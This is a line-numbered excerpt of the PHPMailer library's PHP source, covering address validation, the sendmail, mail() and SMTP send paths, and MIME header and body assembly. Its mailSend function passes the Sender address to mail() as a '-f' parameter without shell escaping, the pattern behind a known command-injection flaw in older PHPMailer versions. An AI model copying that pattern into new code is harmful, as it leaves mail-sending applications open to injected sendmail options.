  940.             } else {
  941.                 //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
  942.                 if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
  943.                     $patternselect = 'php';
  944.                 } else {
  945.                     $patternselect = 'noregex';
  946.                 }
  947.             }
  948.         }
  949.         switch ($patternselect) {
  950.             case 'pcre8':
  951.                 return (boolean)preg_match(
  952.                     '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
  953.                     '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
  954.                     '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
  955.                     '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
  956.                     '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
  957.                     '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
  958.                     '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
  959.                     '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
  960.                     '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
  961.                     $address
  962.                 );
  963.             case 'pcre':
  964.                 //An older regex that doesn't need a recent PCRE
  965.                 return (boolean)preg_match(
  966.                     '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
  967.                     '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
  968.                     '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
  969.                     '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
  970.                     '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
  971.                     '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
  972.                     '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
  973.                     '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
  974.                     '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
  975.                     '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
  976.                     $address
  977.                 );
  978.             case 'html5':
  979.                 return (boolean)preg_match(
  980.                     '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
  981.                     '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
  982.                     $address
  983.                 );
  984.             case 'noregex':
  985.                 return (strlen($address) >= 3
  986.                     and strpos($address, '@') >= 1
  987.                     and strpos($address, '@') != strlen($address) - 1);
  988.             case 'php':
  989.             default:
  990.                 return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
  991.         }
  992.     }
  993.     public function send()
  994.     {
  995.         try {
  996.             if (!$this->preSend()) {
  997.                 return false;
  998.             }
  999.             return $this->postSend();
  1000.         } catch (phpmailerException $exc) {
  1001.             $this->mailHeader = '';
  1002.             $this->setError($exc->getMessage());
  1003.             if ($this->exceptions) {
  1004.                 throw $exc;
  1005.             }
  1006.             return false;
  1007.         }
  1008.     }
  1009.     public function preSend()
  1010.     {
  1011.         try {
  1012.             $this->mailHeader = '';
  1013.             if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) {
  1014.                 throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);
  1015.             }
  1016.             // Set whether the message is multipart/alternative
  1017.             if (!empty($this->AltBody)) {
  1018.                 $this->ContentType = 'multipart/alternative';
  1019.             }
  1020.             $this->error_count = 0; // reset errors
  1021.             $this->setMessageType();
  1022.             // Refuse to send an empty message unless we are specifically allowing it
  1023.             if (!$this->AllowEmpty and empty($this->Body)) {
  1024.                 throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);
  1025.             }
  1026.             $this->MIMEHeader = $this->createHeader();
  1027.             $this->MIMEBody = $this->createBody();
  1028.             if ($this->Mailer == 'mail') {
  1029.                 if (count($this->to) > 0) {
  1030.                     $this->mailHeader .= $this->addrAppend('To', $this->to);
  1031.                 } else {
  1032.                     $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');
  1033.                 }
  1034.                 $this->mailHeader .= $this->headerLine(
  1035.                     'Subject',
  1036.                     $this->encodeHeader($this->secureHeader(trim($this->Subject)))
  1037.                 );
  1038.             }
  1039.             // Sign with DKIM if enabled
  1040.             if (!empty($this->DKIM_domain)
  1041.                 && !empty($this->DKIM_private)
  1042.                 && !empty($this->DKIM_selector)
  1043.                 && file_exists($this->DKIM_private)) {
  1044.                 $header_dkim = $this->DKIM_Add(
  1045.                     $this->MIMEHeader . $this->mailHeader,
  1046.                     $this->encodeHeader($this->secureHeader($this->Subject)),
  1047.                     $this->MIMEBody
  1048.                 );
  1049.                 $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .
  1050.                     str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
  1051.             }
  1052.             return true;
  1053.         } catch (phpmailerException $exc) {
  1054.             $this->setError($exc->getMessage());
  1055.             if ($this->exceptions) {
  1056.                 throw $exc;
  1057.             }
  1058.             return false;
  1059.         }
  1060.     }
  1061.     public function postSend()
  1062.     {
  1063.         try {
  1064.             // Choose the mailer and send through it
  1065.             switch ($this->Mailer) {
  1066.                 case 'sendmail':
  1067.                 case 'qmail':
  1068.                     return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);
  1069.                 case 'mail':
  1070.                     return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
  1071.                 case 'smtp':
  1072.                     return $this->SmtpSend($this->MIMEHeader, $this->MIMEBody);
  1073.                 default:
  1074.                     $sendMethod = $this->Mailer.'Send';
  1075.                     if (method_exists($this, $sendMethod)) {
  1076.                         return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);
  1077.                     }
  1078.                     return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
  1079.             }
  1080.         } catch (phpmailerException $exc) {
  1081.             $this->setError($exc->getMessage());
  1082.             $this->edebug($exc->getMessage());
  1083.             if ($this->exceptions) {
  1084.                 throw $exc;
  1085.             }
  1086.         }
  1087.         return false;
  1088.     }
  1089.     protected function sendmailSend($header, $body)
  1090.     {
  1091.         if ($this->Sender != '') {
  1092.             if ($this->Mailer == 'qmail') {
  1093.                 $sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
  1094.             } else {
  1095.                 $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
  1096.             }
  1097.         } else {
  1098.             if ($this->Mailer == 'qmail') {
  1099.                 $sendmail = sprintf('%s', escapeshellcmd($this->Sendmail));
  1100.             } else {
  1101.                 $sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));
  1102.             }
  1103.         }
  1104.         if ($this->SingleTo) {
  1105.             foreach ($this->SingleToArray as $toAddr) {
  1106.                 if (!@$mail = popen($sendmail, 'w')) {
  1107.                     throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
  1108.                 }
  1109.                 fputs($mail, 'To: ' . $toAddr . "\n");
  1110.                 fputs($mail, $header);
  1111.                 fputs($mail, $body);
  1112.                 $result = pclose($mail);
  1113.                 $this->doCallback(
  1114.                     ($result == 0),
  1115.                     array($toAddr),
  1116.                     $this->cc,
  1117.                     $this->bcc,
  1118.                     $this->Subject,
  1119.                     $body,
  1120.                     $this->From
  1121.                 );
  1122.                 if ($result != 0) {
  1123.                     throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
  1124.                 }
  1125.             }
  1126.         } else {
  1127.             if (!@$mail = popen($sendmail, 'w')) {
  1128.                 throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
  1129.             }
  1130.             fputs($mail, $header);
  1131.             fputs($mail, $body);
  1132.             $result = pclose($mail);
  1133.             $this->doCallback(($result == 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
  1134.             if ($result != 0) {
  1135.                 throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
  1136.             }
  1137.         }
  1138.         return true;
  1139.     }
  1140.     protected function mailSend($header, $body)
  1141.     {
  1142.         $toArr = array();
  1143.         foreach ($this->to as $toaddr) {
  1144.             $toArr[] = $this->addrFormat($toaddr);
  1145.         }
  1146.         $to = implode(', ', $toArr);
  1147.         if (empty($this->Sender)) {
  1148.             $params = ' ';
  1149.         } else {
  1150.             $params = sprintf('-f%s', $this->Sender);
  1151.         }
  1152.         if ($this->Sender != '' and !ini_get('safe_mode')) {
  1153.             $old_from = ini_get('sendmail_from');
  1154.             ini_set('sendmail_from', $this->Sender);
  1155.         }
  1156.         $result = false;
  1157.         if ($this->SingleTo && count($toArr) > 1) {
  1158.             foreach ($toArr as $toAddr) {
  1159.                 $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
  1160.                 $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
  1161.             }
  1162.         } else {
  1163.             $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
  1164.             $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
  1165.         }
  1166.         if (isset($old_from)) {
  1167.             ini_set('sendmail_from', $old_from);
  1168.         }
  1169.         if (!$result) {
  1170.             throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
  1171.         }
  1172.         return true;
  1173.     }
  1174.   public function getSMTPInstance()
  1175.     {
  1176.         if (!is_object($this->smtp)) {
  1177.             $this->smtp = new SMTP;
  1178.         }
  1179.         return $this->smtp;
  1180.     }
  1181.     protected function smtpSend($header, $body)
  1182.     {
  1183.         $bad_rcpt = array();
  1184.         if (!$this->smtpConnect($this->SMTPOptions)) {
  1185.             throw new phpmailerException($this->lang('smtp_connect_failed'), self::STOP_CRITICAL);
  1186.         }
  1187.         if ('' == $this->Sender) {
  1188.             $smtp_from = $this->From;
  1189.         } else {
  1190.             $smtp_from = $this->Sender;
  1191.         }
  1192.         if (!$this->smtp->mail($smtp_from)) {
  1193.             $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError()));
  1194.             throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL);
  1195.         }
  1196.         foreach (array($this->to, $this->cc, $this->bcc) as $togroup) {
  1197.             foreach ($togroup as $to) {
  1198.                 if (!$this->smtp->recipient($to[0])) {
  1199.                     $error = $this->smtp->getError();
  1200.                     $bad_rcpt[] = array('to' => $to[0], 'error' => $error['detail']);
  1201.                     $isSent = false;
  1202.                 } else {
  1203.                     $isSent = true;
  1204.                 }
  1205.                 $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From);
  1206.             }
  1207.         }
  1208.         if ((count($this->all_recipients) > count($bad_rcpt)) and !$this->smtp->data($header . $body)) {
  1209.             throw new phpmailerException($this->lang('data_not_accepted'), self::STOP_CRITICAL);
  1210.         }
  1211.         if ($this->SMTPKeepAlive) {
  1212.             $this->smtp->reset();
  1213.         } else {
  1214.             $this->smtp->quit();
  1215.             $this->smtp->close();
  1216.         }
  1217.         if (count($bad_rcpt) > 0) {
  1218.             $errstr = '';
  1219.             foreach ($bad_rcpt as $bad) {
  1220.                 $errstr .= $bad['to'] . ': ' . $bad['error'];
  1221.             }
  1222.             throw new phpmailerException(
  1223.                 $this->lang('recipients_failed') . $errstr,
  1224.                 self::STOP_CONTINUE
  1225.             );
  1226.         }
  1227.         return true;
  1228.     }
  1229.     public function smtpConnect($options = array())
  1230.     {
  1231.         if (is_null($this->smtp)) {
  1232.             $this->smtp = $this->getSMTPInstance();
  1233.         }
  1234.         if ($this->smtp->connected()) {
  1235.             return true;
  1236.         }
  1237.         $this->smtp->setTimeout($this->Timeout);
  1238.         $this->smtp->setDebugLevel($this->SMTPDebug);
  1239.         $this->smtp->setDebugOutput($this->Debugoutput);
  1240.         $this->smtp->setVerp($this->do_verp);
  1241.         $hosts = explode(';', $this->Host);
  1242.         $lastexception = null;
  1243.         foreach ($hosts as $hostentry) {
  1244.             $hostinfo = array();
  1245.             if (!preg_match('/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*):?([0-9]*)$/', trim($hostentry), $hostinfo)) {
  1246.                 continue;
  1247.             }
  1248.             $prefix = '';
  1249.             $secure = $this->SMTPSecure;
  1250.             $tls = ($this->SMTPSecure == 'tls');
  1251.             if ('ssl' == $hostinfo[2] or ('' == $hostinfo[2] and 'ssl' == $this->SMTPSecure)) {
  1252.                 $prefix = 'ssl://';
  1253.                 $tls = false; // Can't have SSL and TLS at the same time
  1254.                 $secure = 'ssl';
  1255.             } elseif ($hostinfo[2] == 'tls') {
  1256.                 $tls = true;
  1257.                 $secure = 'tls';
  1258.             }
  1259.             $sslext = defined('OPENSSL_ALGO_SHA1');
  1260.             if ('tls' === $secure or 'ssl' === $secure) {
  1261.                 if (!$sslext) {
  1262.                     throw new phpmailerException($this->lang('extension_missing').'openssl', self::STOP_CRITICAL);
  1263.                 }
  1264.             }
  1265.             $host = $hostinfo[3];
  1266.             $port = $this->Port;
  1267.             $tport = (integer)$hostinfo[4];
  1268.             if ($tport > 0 and $tport < 65536) {
  1269.                 $port = $tport;
  1270.             }
  1271.             if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) {
  1272.                 try {
  1273.                     if ($this->Helo) {
  1274.                         $hello = $this->Helo;
  1275.                     } else {
  1276.                         $hello = $this->serverHostname();
  1277.                     }
  1278.                     $this->smtp->hello($hello);
  1279.                     if ($this->SMTPAutoTLS and $sslext and $secure != 'ssl' and $this->smtp->getServerExt('STARTTLS')) {
  1280.                         $tls = true;
  1281.                     }
  1282.                     if ($tls) {
  1283.                         if (!$this->smtp->startTLS()) {
  1284.                             throw new phpmailerException($this->lang('connect_host'));
  1285.                         }
  1286.                         $this->smtp->hello($hello);
  1287.                     }
  1288.                     if ($this->SMTPAuth) {
  1289.                         if (!$this->smtp->authenticate(
  1290.                             $this->Username,
  1291.                             $this->Password,
  1292.                             $this->AuthType,
  1293.                             $this->Realm,
  1294.                             $this->Workstation
  1295.                         )
  1296.                         ) {
  1297.                             throw new phpmailerException($this->lang('authenticate'));
  1298.                         }
  1299.                     }
  1300.                     return true;
  1301.                 } catch (phpmailerException $exc) {
  1302.                     $lastexception = $exc;
  1303.                     $this->edebug($exc->getMessage());
  1304.                     $this->smtp->quit();
  1305.                 }
  1306.             }
  1307.         }
  1308.         $this->smtp->close();
  1309.         if ($this->exceptions and !is_null($lastexception)) {
  1310.             throw $lastexception;
  1311.         }
  1312.         return false;
  1313.     }
  1314.     public function smtpClose()
  1315.     {
  1316.         if ($this->smtp !== null) {
  1317.             if ($this->smtp->connected()) {
  1318.                 $this->smtp->quit();
  1319.                 $this->smtp->close();
  1320.             }
  1321.         }
  1322.     }
  1323.  
  1324.     public function setLanguage($langcode = 'en', $lang_path = '')
  1325.     {
  1326.         // Define full set of translatable strings in English
  1327.         $PHPMAILER_LANG = array(
  1328.             'authenticate' => 'SMTP Error: Could not authenticate.',
  1329.             'connect_host' => 'SMTP Error: Could not connect to SMTP host.',
  1330.             'data_not_accepted' => 'SMTP Error: data not accepted.',
  1331.             'empty_message' => 'Message body empty',
  1332.             'encoding' => 'Unknown encoding: ',
  1333.             'execute' => 'Could not execute: ',
  1334.             'file_access' => 'Could not access file: ',
  1335.             'file_open' => 'File Error: Could not open file: ',
  1336.             'from_failed' => 'The following From address failed: ',
  1337.             'instantiate' => 'Could not instantiate mail function.',
  1338.             'invalid_address' => 'Invalid address',
  1339.             'mailer_not_supported' => ' mailer is not supported.',
  1340.             'provide_address' => 'You must provide at least one recipient email address.',
  1341.             'recipients_failed' => 'SMTP Error: The following recipients failed: ',
  1342.             'signing' => 'Signing Error: ',
  1343.             'smtp_connect_failed' => 'SMTP connect() failed.',
  1344.             'smtp_error' => 'SMTP server error: ',
  1345.             'variable_set' => 'Cannot set or reset variable: '
  1346.         );
  1347.         if (empty($lang_path)) {
  1348.             // Calculate an absolute path so it can work if CWD is not here
  1349.             $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
  1350.         }
  1351.         $foundlang = true;
  1352.         $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
  1353.         if ($langcode != 'en') { // There is no English translation file
  1354.             // Make sure language file path is readable
  1355.             if (!is_readable($lang_file)) {
  1356.                 $foundlang = false;
  1357.             } else {
  1358.                 $foundlang = include $lang_file;
  1359.             }
  1360.         }
  1361.         $this->language = $PHPMAILER_LANG;
  1362.         return (boolean)$foundlang; // Returns false if language not found
  1363.     }
  1364.     public function getTranslations()
  1365.     {
  1366.         return $this->language;
  1367.     }
  1368.     public function addrAppend($type, $addr)
  1369.     {
  1370.         $addresses = array();
  1371.         foreach ($addr as $address) {
  1372.             $addresses[] = $this->addrFormat($address);
  1373.         }
  1374.         return $type . ': ' . implode(', ', $addresses) . $this->LE;
  1375.     }
  1376.  
  1377.     public function addrFormat($addr)
  1378.     {
  1379.         if (empty($addr[1])) { // No name provided
  1380.             return $this->secureHeader($addr[0]);
  1381.         } else {
  1382.             return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(
  1383.                 $addr[0]
  1384.             ) . '>';
  1385.         }
  1386.     }
  1387.  
  1388.     public function wrapText($message, $length, $qp_mode = false)
  1389.     {
  1390.         $soft_break = ($qp_mode) ? sprintf(' =%s', $this->LE) : $this->LE;
  1391.         $is_utf8 = (strtolower($this->CharSet) == 'utf-8');
  1392.         $lelen = strlen($this->LE);
  1393.         $crlflen = strlen(self::CRLF);
  1394.         $message = $this->fixEOL($message);
  1395.         if (substr($message, -$lelen) == $this->LE) {
  1396.             $message = substr($message, 0, -$lelen);
  1397.         }
  1398.         $line = explode($this->LE, $message); // Magic. We know fixEOL uses $LE
  1399.         $message = '';
  1400.         for ($i = 0; $i < count($line); $i++) {
  1401.             $line_part = explode(' ', $line[$i]);
  1402.             $buf = '';
  1403.             for ($e = 0; $e < count($line_part); $e++) {
  1404.                 $word = $line_part[$e];
  1405.                 if ($qp_mode and (strlen($word) > $length)) {
  1406.                     $space_left = $length - strlen($buf) - $crlflen;
  1407.                     if ($e != 0) {
  1408.                         if ($space_left > 20) {
  1409.                             $len = $space_left;
  1410.                             if ($is_utf8) {
  1411.                                 $len = $this->utf8CharBoundary($word, $len);
  1412.                             } elseif (substr($word, $len - 1, 1) == '=') {
  1413.                                 $len--;
  1414.                             } elseif (substr($word, $len - 2, 1) == '=') {
  1415.                                 $len -= 2;
  1416.                             }
  1417.                             $part = substr($word, 0, $len);
  1418.                             $word = substr($word, $len);
  1419.                             $buf .= ' ' . $part;
  1420.                             $message .= $buf . sprintf('=%s', self::CRLF);
  1421.                         } else {
  1422.                             $message .= $buf . $soft_break;
  1423.                         }
  1424.                         $buf = '';
  1425.                     }
  1426.                     while (strlen($word) > 0) {
  1427.                         if ($length <= 0) {
  1428.                             break;
  1429.                         }
  1430.                         $len = $length;
  1431.                         if ($is_utf8) {
  1432.                             $len = $this->utf8CharBoundary($word, $len);
  1433.                         } elseif (substr($word, $len - 1, 1) == '=') {
  1434.                             $len--;
  1435.                         } elseif (substr($word, $len - 2, 1) == '=') {
  1436.                             $len -= 2;
  1437.                         }
  1438.                         $part = substr($word, 0, $len);
  1439.                         $word = substr($word, $len);
  1440.                         if (strlen($word) > 0) {
  1441.                             $message .= $part . sprintf('=%s', self::CRLF);
  1442.                         } else {
  1443.                             $buf = $part;
  1444.                         }
  1445.                     }
  1446.                 } else {
  1447.                     $buf_o = $buf;
  1448.                     $buf .= ($e == 0) ? $word : (' ' . $word);
  1449.                     if (strlen($buf) > $length and $buf_o != '') {
  1450.                         $message .= $buf_o . $soft_break;
  1451.                         $buf = $word;
  1452.                     }
  1453.                 }
  1454.             }
  1455.             $message .= $buf . self::CRLF;
  1456.         }
  1457.         return $message;
  1458.     }
  1459.     public function utf8CharBoundary($encodedText, $maxLength)
  1460.     {
  1461.         $foundSplitPos = false;
  1462.         $lookBack = 3;
  1463.         while (!$foundSplitPos) {
  1464.             $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
  1465.             $encodedCharPos = strpos($lastChunk, '=');
  1466.             if (false !== $encodedCharPos) {
  1467.                 // Found start of encoded character byte within $lookBack block.
  1468.                 // Check the encoded byte value (the 2 chars after the '=')
  1469.                 $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
  1470.                 $dec = hexdec($hex);
  1471.                 if ($dec < 128) { // Single byte character.
  1472.                     // If the encoded char was found at pos 0, it will fit
  1473.                     // otherwise reduce maxLength to start of the encoded char
  1474.                     $maxLength = ($encodedCharPos == 0) ? $maxLength :
  1475.                         $maxLength - ($lookBack - $encodedCharPos);
  1476.                     $foundSplitPos = true;
  1477.                 } elseif ($dec >= 192) { // First byte of a multi byte character
  1478.                     // Reduce maxLength to split at start of character
  1479.                     $maxLength = $maxLength - ($lookBack - $encodedCharPos);
  1480.                     $foundSplitPos = true;
  1481.                 } elseif ($dec < 192) { // Middle byte of a multi byte character, look further back
  1482.                     $lookBack += 3;
  1483.                 }
  1484.             } else {
  1485.                 // No encoded character found
  1486.                 $foundSplitPos = true;
  1487.             }
  1488.         }
  1489.         return $maxLength;
  1490.     }
  1491.     public function setWordWrap()
  1492.     {
  1493.         if ($this->WordWrap < 1) {
  1494.             return;
  1495.         }
  1496.         switch ($this->message_type) {
  1497.             case 'alt':
  1498.             case 'alt_inline':
  1499.             case 'alt_attach':
  1500.             case 'alt_inline_attach':
  1501.                 $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);
  1502.                 break;
  1503.             default:
  1504.                 $this->Body = $this->wrapText($this->Body, $this->WordWrap);
  1505.                 break;
  1506.         }
  1507.     }
  1508.     public function createHeader()
  1509.     {
  1510.         $result = '';
  1511.         // Set the boundaries
  1512.         $uniq_id = md5(uniqid(time()));
  1513.         $this->boundary[1] = 'b1_' . $uniq_id;
  1514.         $this->boundary[2] = 'b2_' . $uniq_id;
  1515.         $this->boundary[3] = 'b3_' . $uniq_id;
  1516.         if ($this->MessageDate == '') {
  1517.             $this->MessageDate = self::rfcDate();
  1518.         }
  1519.         $result .= $this->headerLine('Date', $this->MessageDate);
  1520.  
  1521.         // To be created automatically by mail()
  1522.         if ($this->SingleTo) {
  1523.             if ($this->Mailer != 'mail') {
  1524.                 foreach ($this->to as $toaddr) {
  1525.                     $this->SingleToArray[] = $this->addrFormat($toaddr);
  1526.                 }
  1527.             }
  1528.         } else {
  1529.             if (count($this->to) > 0) {
  1530.                 if ($this->Mailer != 'mail') {
  1531.                     $result .= $this->addrAppend('To', $this->to);
  1532.                 }
  1533.             } elseif (count($this->cc) == 0) {
  1534.                 $result .= $this->headerLine('To', 'undisclosed-recipients:;');
  1535.             }
  1536.         }
  1537.         $result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName)));
  1538.         // sendmail and mail() extract Cc from the header before sending
  1539.         if (count($this->cc) > 0) {
  1540.             $result .= $this->addrAppend('Cc', $this->cc);
  1541.         }
  1542.         // sendmail and mail() extract Bcc from the header before sending
  1543.         if ((
  1544.                 $this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail'
  1545.             )
  1546.             and count($this->bcc) > 0
  1547.         ) {
  1548.             $result .= $this->addrAppend('Bcc', $this->bcc);
  1549.         }
  1550.         if (count($this->ReplyTo) > 0) {
  1551.             $result .= $this->addrAppend('Reply-To', $this->ReplyTo);
  1552.         }
  1553.         // mail() sets the subject itself
  1554.         if ($this->Mailer != 'mail') {
  1555.             $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject)));
  1556.         }
  1557.         if ($this->MessageID != '') {
  1558.             $this->lastMessageID = $this->MessageID;
  1559.         } else {
  1560.             $this->lastMessageID = sprintf('<%s@%s>', $uniq_id, $this->ServerHostname());
  1561.        }
  1562.        $result .= $this->HeaderLine('Message-ID', $this->lastMessageID);
  1563.        $result .= $this->headerLine('X-Priority', $this->Priority);
  1564.        if ($this->XMailer == '') {
  1565.            $result .= $this->headerLine(
  1566.                'X-Mailer',
  1567.                'PHPMailer ' . $this->Version . ' (https://github.com/PHPMailer/PHPMailer/)'
  1568.             );
  1569.         } else {
  1570.             $myXmailer = trim($this->XMailer);
  1571.             if ($myXmailer) {
  1572.                 $result .= $this->headerLine('X-Mailer', $myXmailer);
  1573.             }
  1574.         }
  1575.         if ($this->ConfirmReadingTo != '') {
  1576.             $result .= $this->headerLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>');
  1577.         }
  1578.         // Add custom headers
  1579.         for ($index = 0; $index < count($this->CustomHeader); $index++) {
  1580.             $result .= $this->headerLine(
  1581.                 trim($this->CustomHeader[$index][0]),
  1582.                 $this->encodeHeader(trim($this->CustomHeader[$index][1]))
  1583.             );
  1584.         }
  1585.         if (!$this->sign_key_file) {
  1586.             $result .= $this->headerLine('MIME-Version', '1.0');
  1587.             $result .= $this->getMailMIME();
  1588.         }
  1589.         return $result;
  1590.     }
  1591.     public function getMailMIME()
  1592.     {
  1593.         $result = '';
  1594.         $ismultipart = true;
  1595.         switch ($this->message_type) {
  1596.             case 'inline':
  1597.                 $result .= $this->headerLine('Content-Type', 'multipart/related;');
  1598.                 $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
  1599.                 break;
  1600.             case 'attach':
  1601.             case 'inline_attach':
  1602.             case 'alt_attach':
  1603.             case 'alt_inline_attach':
  1604.                 $result .= $this->headerLine('Content-Type', 'multipart/mixed;');
  1605.                 $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
  1606.                 break;
  1607.             case 'alt':
  1608.             case 'alt_inline':
  1609.                 $result .= $this->headerLine('Content-Type', 'multipart/alternative;');
  1610.                 $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
  1611.                 break;
  1612.             default:
  1613.                 // Catches case 'plain': and case '':
  1614.                 $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet);
  1615.                 $ismultipart = false;
  1616.                 break;
  1617.         }
  1618.         // RFC1341 part 5 says 7bit is assumed if not specified
  1619.         if ($this->Encoding != '7bit') {
  1620.             // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
  1621.             if ($ismultipart) {
  1622.                 if ($this->Encoding == '8bit') {
  1623.                     $result .= $this->headerLine('Content-Transfer-Encoding', '8bit');
  1624.                 }
  1625.                 // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
  1626.             } else {
  1627.                 $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding);
  1628.             }
  1629.         }
  1630.         if ($this->Mailer != 'mail') {
  1631.             $result .= $this->LE;
  1632.         }
  1633.         return $result;
  1634.     }
  1635.     public function getSentMIMEMessage()
  1636.     {
  1637.         return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody;
  1638.     }
  1639.  
  1640.     public function createBody()
  1641.     {
  1642.         $body = '';
  1643.         if ($this->sign_key_file) {
  1644.             $body .= $this->getMailMIME() . $this->LE;
  1645.         }
  1646.         $this->setWordWrap();
  1647.         $bodyEncoding = $this->Encoding;
  1648.         $bodyCharSet = $this->CharSet;
  1649.         if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) {
  1650.             $bodyEncoding = '7bit';
  1651.             $bodyCharSet = 'us-ascii';
  1652.         }
  1653.         $altBodyEncoding = $this->Encoding;
  1654.         $altBodyCharSet = $this->CharSet;
  1655.         if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) {
  1656.             $altBodyEncoding = '7bit';
  1657.             $altBodyCharSet = 'us-ascii';
  1658.         }
  1659.         switch ($this->message_type) {
  1660.             case 'inline':
  1661.                 $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
  1662.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
